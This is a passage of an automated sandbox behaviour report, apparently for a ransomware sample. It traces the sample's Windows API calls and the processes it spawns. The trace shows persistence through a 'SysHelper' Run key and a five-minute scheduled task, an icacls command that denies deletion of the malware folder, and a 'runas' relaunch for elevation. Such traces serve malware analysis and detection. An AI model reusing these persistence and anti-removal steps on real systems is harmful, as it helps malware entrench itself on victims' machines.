HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --AutoStart" [0140.959] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --AutoStart") returned 115 [0140.959] RegSetValueExW (in: hKey=0x5c4, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --AutoStart", cbData=0xe6 | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --AutoStart") returned 0x0 [0140.960] RegCloseKey (hKey=0x5c4) returned 0x0 [0140.960] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xd0) returned 0x351b9e8 [0140.960] SetLastError (dwErrCode=0x0) [0140.960] lstrcpyW (in: lpString1=0x18ad28, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0140.960] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c" [0140.960] lstrcatW (in: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0140.960] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18dd28*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18dd84 | out: lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18dd84*(hProcess=0x3e0, hThread=0x5c4, dwProcessId=0x828, dwThreadId=0xbf4)) returned 1 [0140.971] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1) returned 0x102 [0141.137] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1) returned 0x102 [0141.308] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1) returned 0x102 [0141.324] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1) returned 0x102 [0141.339] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1) returned 0x102 [0141.355] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1) returned 0x102 [0141.370] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0x1) returned 0x0 [0141.379] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35218b0 | out: hHeap=0x9f0000) returned 1 [0141.379] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35ae130 | out: hHeap=0x9f0000) returned 1 [0141.379] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xd0) returned 0x351bac0 [0141.379] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xd0) returned 0x351bb98 [0141.379] CoInitialize (pvReserved=0x0) returned 0x0 [0142.293] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0142.300] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xd0) returned 0x351bc70 [0142.305] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18ddec | out: ppv=0x18ddec*=0x2cc08e0) returned 0x0 [0142.604] TaskScheduler:ITaskService:Connect (This=0x2cc08e0, serverName=0x18d878*(varType=0x0, wReserved1=0x77c6, wReserved2=0xe0d2, wReserved3=0x77c6, varVal1=0x67, varVal2=0xd0), user=0x18d888*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xd8), domain=0x18d898*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), password=0x18d8a8*(varType=0x0, wReserved1=0xa5, wReserved2=0xdd94, wReserved3=0x18, varVal1=0x420cab, varVal2=0x9f0000)) returned 0x0 [0142.613] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xc) returned 0x35fb580 [0142.613] TaskScheduler:ITaskService:GetFolder (in: This=0x2cc08e0, Path="\\", ppFolder=0x18ddf4 | out: ppFolder=0x18ddf4*=0x31ff98) returned 0x0 [0142.623] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35fb580 | out: hHeap=0x9f0000) returned 1 [0142.623] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xc) returned 0x35fb580 [0142.623] ITaskFolder:DeleteTask (This=0x31ff98, Name="Time Trigger Task", flags=0) returned 0x80070002 [0142.625] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35fb580 | out: hHeap=0x9f0000) returned 1 [0142.625] TaskScheduler:ITaskService:NewTask (in: This=0x2cc08e0, flags=0x0, ppDefinition=0x18ddf8 | out: ppDefinition=0x18ddf8*=0x2cc0968) returned 0x0 [0142.628] TaskScheduler:IUnknown:Release (This=0x2cc08e0) returned 0x1 [0142.628] ITaskDefinition:get_RegistrationInfo (in: This=0x2cc0968, ppRegistrationInfo=0x18ddcc | out: ppRegistrationInfo=0x18ddcc*=0x2cc0a28) returned 0x0 [0142.628] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xc) returned 0x35fb5b0 [0142.628] IRegistrationInfo:put_Author (This=0x2cc0a28, Author="Author Name") returned 0x0 [0142.628] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35fb5b0 | out: hHeap=0x9f0000) returned 1 [0142.628] IUnknown:Release (This=0x2cc0a28) returned 0x1 [0142.628] ITaskDefinition:get_Principal (in: This=0x2cc0968, ppPrincipal=0x18ddd4 | out: ppPrincipal=0x18ddd4*=0x2cc0bb8) returned 0x0 [0142.628] IPrincipal:put_LogonType (This=0x2cc0bb8, LogonType=3) returned 0x0 [0142.628] IUnknown:Release (This=0x2cc0bb8) returned 0x1 [0142.628] ITaskDefinition:get_Settings (in: This=0x2cc0968, ppSettings=0x18dddc | out: ppSettings=0x18dddc*=0x2cc0ad8) returned 0x0 [0142.628] ITaskSettings:put_StartWhenAvailable (This=0x2cc0ad8, StartWhenAvailable=1) returned 0x0 [0142.628] IUnknown:Release (This=0x2cc0ad8) returned 0x1 [0142.628] ITaskSettings:get_IdleSettings (in: This=0x2cc0ad8, ppIdleSettings=0x18ddc0 | out: ppIdleSettings=0x18ddc0*=0x2cc0b48) returned 0x0 [0142.629] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xc) returned 0x35fb5b0 [0142.629] IIdleSettings:put_WaitTimeout (This=0x2cc0b48, WaitTimeout="PT5M") returned 0x0 [0142.629] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35fb5b0 | out: hHeap=0x9f0000) returned 1 [0142.629] IUnknown:Release (This=0x2cc0b48) returned 0x1 [0142.629] ITaskDefinition:get_Triggers (in: This=0x2cc0968, ppTriggers=0x18ddbc | out: ppTriggers=0x18ddbc*=0x2cc0a98) returned 0x0 [0142.629] ITriggerCollection:Create (in: This=0x2cc0a98, Type=1, ppTrigger=0x18ddc8 | out: ppTrigger=0x18ddc8*=0x2cc0c18) returned 0x0 [0142.629] IUnknown:Release (This=0x2cc0a98) returned 0x1 [0142.629] IUnknown:QueryInterface (in: This=0x2cc0c18, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18dde4 | out: ppvObject=0x18dde4*=0x2cc0c18) returned 0x0 [0142.629] IUnknown:Release (This=0x2cc0c18) returned 0x2 [0142.629] ITrigger:get_Repetition (in: This=0x2cc0c18, ppRepeat=0x18ddd0 | out: ppRepeat=0x18ddd0*=0x2cc0c68) returned 0x0 [0142.629] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xc) returned 0x35fb5b0 [0142.629] IRepetitionPattern:put_Interval (This=0x2cc0c68, Interval="PT5M") returned 0x0 [0142.629] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35fb5b0 | out: hHeap=0x9f0000) returned 1 [0142.629] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xc) returned 0x35fb5b0 [0142.629] IRepetitionPattern:put_Duration (This=0x2cc0c68, Duration="") returned 0x0 [0142.631] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35fb5b0 | out: hHeap=0x9f0000) returned 1 [0142.632] ITrigger:put_Repetition (This=0x2cc0c18, Repetition=0x2cc0c68) returned 0x0 [0142.632] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xc) returned 0x35fb5b0 [0142.632] ITrigger:put_Id (This=0x2cc0c18, Id="Trigger1") returned 0x0 [0142.632] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35fb5b0 | out: hHeap=0x9f0000) returned 1 [0142.632] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xc) returned 0x35fb5b0 [0142.632] ITrigger:put_EndBoundary (This=0x2cc0c18, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0142.632] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35fb5b0 | out: hHeap=0x9f0000) returned 1 [0142.632] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d8a4 | out: lpSystemTimeAsFileTime=0x18d8a4*(dwLowDateTime=0xe4830e0, dwHighDateTime=0x1d69ad5)) [0142.644] GetLastError () returned 0x0 [0142.656] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x24) returned 0x3608270 [0142.668] GetLastError () returned 0x0 [0142.674] GetLastError () returned 0x0 [0142.680] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0142.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d80c | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d80c) returned 26 [0142.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d80c | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d80c) returned 26 [0142.863] GetLastError () returned 0x0 [0142.863] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x24) returned 0x36082a0 [0142.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x36082a0, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0142.863] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xa0) returned 0x35281b0 [0142.863] GetLastError () returned 0x0 [0142.920] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x20) returned 0x35afdc0 [0142.929] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x826) returned 0x3b9efb8 [0142.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x35afdc0, cbMultiByte=-1, lpWideCharStr=0x3b9efb8, cchWideChar=1043 | out: lpWideCharStr="2020-10-05T16:06:36") returned 20 [0142.936] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x830) returned 0x3b9f7e8 [0142.936] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x3b9efb8 | out: hHeap=0x9f0000) returned 1 [0142.936] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35afdc0 | out: hHeap=0x9f0000) returned 1 [0142.936] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xc) returned 0x35fb5b0 [0142.936] ITrigger:put_StartBoundary (This=0x2cc0c18, StartBoundary="2020-10-05T16:06:36") returned 0x0 [0142.936] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35fb5b0 | out: hHeap=0x9f0000) returned 1 [0142.936] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x3b9f7e8 | out: hHeap=0x9f0000) returned 1 [0142.936] IUnknown:Release (This=0x2cc0c18) returned 0x1 [0142.936] ITaskDefinition:get_Actions (in: This=0x2cc0968, ppActions=0x18ddd8 | out: ppActions=0x18ddd8*=0x2cc09e0) returned 0x0 [0142.936] IActionCollection:Create (in: This=0x2cc09e0, Type=0, ppAction=0x18ddc4 | out: ppAction=0x18ddc4*=0x2cc0ca0) returned 0x0 [0142.938] IUnknown:Release (This=0x2cc09e0) returned 0x1 [0142.938] IUnknown:QueryInterface (in: This=0x2cc0ca0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18dde0 | out: ppvObject=0x18dde0*=0x2cc0ca0) returned 0x0 [0142.938] IUnknown:Release (This=0x2cc0ca0) returned 0x2 [0142.938] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xc) returned 0x35fb5b0 [0142.938] IExecAction:put_Path (This=0x2cc0ca0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe") returned 0x0 [0142.938] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35fb5b0 | out: hHeap=0x9f0000) returned 1 [0142.938] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xc) returned 0x35fb5b0 [0142.939] IExecAction:put_Arguments (This=0x2cc0ca0, Arguments="--Task") returned 0x0 [0142.939] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35fb5b0 | out: hHeap=0x9f0000) returned 1 [0142.939] IUnknown:Release (This=0x2cc0ca0) returned 0x1 [0142.939] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0xc) returned 0x35fb5b0 [0142.939] ITaskFolder:RegisterTaskDefinition (in: This=0x31ff98, Path="Time Trigger Task", pDefinition=0x2cc0968, flags=6, UserId=0x18d880*(varType=0x0, wReserved1=0xa5, wReserved2=0xdd94, wReserved3=0x18, varVal1=0x420cab, varVal2=0x9f0000), password=0x18d890*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), LogonType=3, sddl=0x18d8a4*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xd8), ppTask=0x18ddac | out: ppTask=0x18ddac*=0x2cc0d10) returned 0x0 [0143.772] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x35fb5b0 | out: hHeap=0x9f0000) returned 1 [0143.772] TaskScheduler:IUnknown:Release (This=0x31ff98) returned 0x0 [0143.772] TaskScheduler:IUnknown:Release (This=0x2cc0968) returned 0x0 [0143.772] IUnknown:Release (This=0x2cc0d10) returned 0x0 [0143.773] CoUninitialize () [0143.775] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x351bc70 | out: hHeap=0x9f0000) returned 1 [0143.775] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x351bb98 | out: hHeap=0x9f0000) returned 1 [0143.781] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x351bac0 | out: hHeap=0x9f0000) returned 1 [0143.781] GetVersion () returned 0x1db10106 [0143.781] lstrcpyW (in: lpString1=0x18e210, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0143.781] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0143.781] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0143.781] ShellExecuteExW (in: pExecInfo=0x18dfd4*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18dfd4*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0143.894] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x3521740 | out: hHeap=0x9f0000) returned 1 [0143.894] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x351b9e8 | out: hHeap=0x9f0000) returned 1 [0143.894] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0xa5a188 | out: hHeap=0x9f0000) returned 1 [0144.117] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0xa1df58 | out: hHeap=0x9f0000) returned 1 [0144.117] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0xa0e610 | out: hHeap=0x9f0000) returned 1 [0144.117] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0xa5a990 | out: hHeap=0x9f0000) returned 1 [0144.118] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x3b04930 | out: hHeap=0x9f0000) returned 1 [0144.123] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0xa11480 | out: hHeap=0x9f0000) returned 1 [0144.303] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0xa10598 | out: hHeap=0x9f0000) returned 1 [0144.303] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f29c | out: phModule=0x18f29c) returned 0 [0144.303] ExitProcess (uExitCode=0x0) [0144.484] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0x3608270 | out: hHeap=0x9f0000) returned 1 [0144.484] HeapFree (in: hHeap=0x9f0000, dwFlags=0x0, lpMem=0xa0f1c0 | out: hHeap=0x9f0000) returned 1 [0144.531] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0x358 Thread: id = 3 os_tid = 0x5bc Thread: id = 4 os_tid = 0x53c Thread: id = 5 os_tid = 0x1c0 Thread: id = 6 os_tid = 0x7cc Thread: id = 7 os_tid = 0x7fc Thread: id = 21 os_tid = 0x93c Thread: id = 22 os_tid = 0x94c Thread: id = 68 os_tid = 0x95c Thread: id = 70 os_tid = 0x64 Thread: id = 71 os_tid = 0x3a4 Thread: id = 80 os_tid = 0xbfc Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 8 os_tid = 0xbcc Thread: id = 9 os_tid = 0x768 Thread: id = 10 os_tid = 0x764 Thread: id = 11 os_tid = 0x758 Thread: id = 12 os_tid = 0x724 Thread: id = 13 os_tid = 0x718 Thread: id = 14 os_tid = 0x714 Thread: id = 15 os_tid = 0x154 Thread: id = 16 os_tid = 0x150 Thread: id = 17 os_tid = 0x120 Thread: id = 18 os_tid = 0x124 Thread: id = 19 os_tid = 0x118 Thread: id = 20 os_tid = 0xf0 Thread: id = 69 os_tid = 0x96c Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 23 os_tid = 0x8fc Thread: id = 24 os_tid = 0x8b4 Thread: id = 25 os_tid = 0x874 Thread: id = 26 os_tid = 0x864 Thread: id = 27 os_tid = 0x854 Thread: id = 28 os_tid = 0x844 Thread: id = 29 os_tid = 0x834 Thread: id = 30 os_tid = 0x824 Thread: id = 31 os_tid = 0x814 Thread: id = 32 os_tid = 0x804 Thread: id = 33 os_tid = 0xab4 Thread: id = 34 os_tid = 0xab8 Thread: id = 35 os_tid = 0xa5c Thread: id = 36 os_tid = 0xa60 Thread: id = 37 os_tid = 0x320 Thread: id = 38 os_tid = 0x42c Thread: id = 39 os_tid = 0x1e4 Thread: id = 40 os_tid = 0x760 Thread: id = 41 os_tid = 0x74c Thread: id = 42 os_tid = 0x710 Thread: id = 43 os_tid = 0x6d0 Thread: id = 44 os_tid = 0x6bc Thread: id = 45 os_tid = 0x6b0 Thread: id = 46 os_tid = 0x69c Thread: id = 47 os_tid = 0x698 Thread: id = 48 os_tid = 0x684 Thread: id = 49 os_tid = 0x678 Thread: id = 50 os_tid = 0x4a8 Thread: id = 51 os_tid = 0x46c Thread: id = 52 os_tid = 0x44c Thread: id = 53 os_tid = 0x424 Thread: id = 54 os_tid = 0x420 Thread: id = 55 os_tid = 0x41c Thread: id = 56 os_tid = 0x404 Thread: id = 57 os_tid = 0x14c Thread: id = 58 os_tid = 0x158 Thread: id = 59 os_tid = 0x3fc Thread: id = 60 os_tid = 0x3f4 Thread: id = 61 os_tid = 0x3e8 Thread: id = 62 os_tid = 0x39c Thread: id = 63 os_tid = 0x390 Thread: id = 64 os_tid = 0x38c Thread: id = 65 os_tid = 0x388 Thread: id = 66 os_tid = 0x37c Thread: id = 67 os_tid = 0x374 Process: id = "4" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x3bfea000" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x414" cmd_line = "icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 72 os_tid = 0xbf4 Thread: id = 73 os_tid = 0x5e4 Process: id = "5" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x76a3f000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4568F795-B030-4E70-B052-419BC1469E0B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" 